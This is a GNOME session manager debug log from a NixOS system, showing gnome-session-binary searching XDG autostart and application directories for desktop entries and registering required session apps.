machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/share/applications/org.gnome.Shell.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App1 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.Shell.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.A11ySettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.A11ySettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.A11ySettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.A11ySettings.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App2 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.A11ySettings.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Color.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.A11ySettings.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App2 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.A11ySettings.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Color.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
